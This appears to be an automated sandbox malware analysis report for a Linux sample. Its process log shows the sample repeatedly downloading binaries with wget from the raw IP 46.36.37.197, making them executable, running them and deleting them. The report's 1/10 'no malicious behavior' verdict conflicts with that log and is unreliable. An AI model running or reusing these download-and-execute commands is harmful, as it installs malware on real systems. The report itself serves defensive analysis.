Malware Analysis Report

2024-10-10 11:09

Sample ID 240614-lf6ffsybpq
Target a8f8e353270c830f56e946941a4bff39_JaffaCakes118
SHA256 f8de487503f1ed3080384b523d7abcde65ed4db6716e312ec4d9abfb66986af8
score
1/10

Analysis Overview

score
1/10

SHA256

f8de487503f1ed3080384b523d7abcde65ed4db6716e312ec4d9abfb66986af8

Threat Level: No (potentially) malicious behavior was detected

The file a8f8e353270c830f56e946941a4bff39_JaffaCakes118 was analyzed; no (potentially) malicious behavior was detected.

Malicious Activity Summary

N/A

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-14 09:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 09:29

Reported

2024-06-14 09:32

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

1s

Max time network

128s

Command Line

[/tmp/a8f8e353270c830f56e946941a4bff39_JaffaCakes118]

Signatures

N/A

Processes

/tmp/a8f8e353270c830f56e946941a4bff39_JaffaCakes118

[/tmp/a8f8e353270c830f56e946941a4bff39_JaffaCakes118]

/usr/bin/wget

[wget http://46.36.37.197/weedntpd]

/bin/chmod

[chmod +x weedntpd]

/tmp/weedntpd

[./weedntpd]

/bin/rm

[rm -rf weedntpd]

/usr/bin/wget

[wget http://46.36.37.197/weedsshd]

/bin/chmod

[chmod +x weedsshd]

/tmp/weedsshd

[./weedsshd]

/bin/rm

[rm -rf weedsshd]

/usr/bin/wget

[wget http://46.36.37.197/weedopenssh]

/bin/chmod

[chmod +x weedopenssh]

/tmp/weedopenssh

[./weedopenssh]

/bin/rm

[rm -rf weedopenssh]

/usr/bin/wget

[wget http://46.36.37.197/weedbash]

/bin/chmod

[chmod +x weedbash]

/tmp/weedbash

[./weedbash]

/bin/rm

[rm -rf weedbash]

/usr/bin/wget

[wget http://46.36.37.197/weedtftp]

/bin/chmod

[chmod +x weedtftp]

/tmp/weedtftp

[./weedtftp]

/bin/rm

[rm -rf weedtftp]

/usr/bin/wget

[wget http://46.36.37.197/weedwget]

/bin/chmod

[chmod +x weedwget]

/tmp/weedwget

[./weedwget]

/bin/rm

[rm -rf weedwget]

/usr/bin/wget

[wget http://46.36.37.197/weedcron]

/bin/chmod

[chmod +x weedcron]

/tmp/weedcron

[./weedcron]

/bin/rm

[rm -rf weedcron]

/usr/bin/wget

[wget http://46.36.37.197/weedftp]

/bin/chmod

[chmod +x weedftp]

/tmp/weedftp

[./weedftp]

/bin/rm

[rm -rf weedftp]

/usr/bin/wget

[wget http://46.36.37.197/weedpftp]

/bin/chmod

[chmod +x weedpftp]

/tmp/weedpftp

[./weedpftp]

/bin/rm

[rm -rf weedpftp]

/usr/bin/wget

[wget http://46.36.37.197/weedsh]

/bin/chmod

[chmod +x weedsh]

/tmp/weedsh

[./weedsh]

/bin/rm

[rm -rf weedsh]

/usr/bin/wget

[wget http://46.36.37.197/weedshit]

/bin/chmod

[chmod +x weedshit]

/tmp/weedshit

[./weedshit]

/bin/rm

[rm -rf weedshit]

/usr/bin/wget

[wget http://46.36.37.197/weedapache2]

/bin/chmod

[chmod +x weedapache2]

/tmp/weedapache2

[./weedapache2]

/bin/rm

[rm -rf weedapache2]

/usr/bin/wget

[wget http://46.36.37.197/weedtelnetd]

/bin/chmod

[chmod +x weedtelnetd]

/tmp/weedtelnetd

[./weedtelnetd]

/bin/rm

[rm -rf weedtelnetd]

Network

Country  Destination           Domain         Proto
CZ       46.36.37.197:80       46.36.37.197   tcp
N/A      224.0.0.251:5353                     udp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
GB       185.125.188.61:443                   tcp
GB       185.125.188.61:443                   tcp
US       151.101.65.91:443                    tcp
US       151.101.65.91:443                    tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
GB       195.181.164.19:443                   tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 09:29

Reported

2024-06-14 09:32

Platform

debian9-armhf-20240611-en

Max time network

6s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country  Destination           Domain         Proto
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp
CZ       46.36.37.197:80       46.36.37.197   tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-14 09:29

Reported

2024-06-14 09:29

Platform

debian9-mipsbe-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-14 09:29

Reported

2024-06-14 09:29

Platform

debian9-mipsel-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A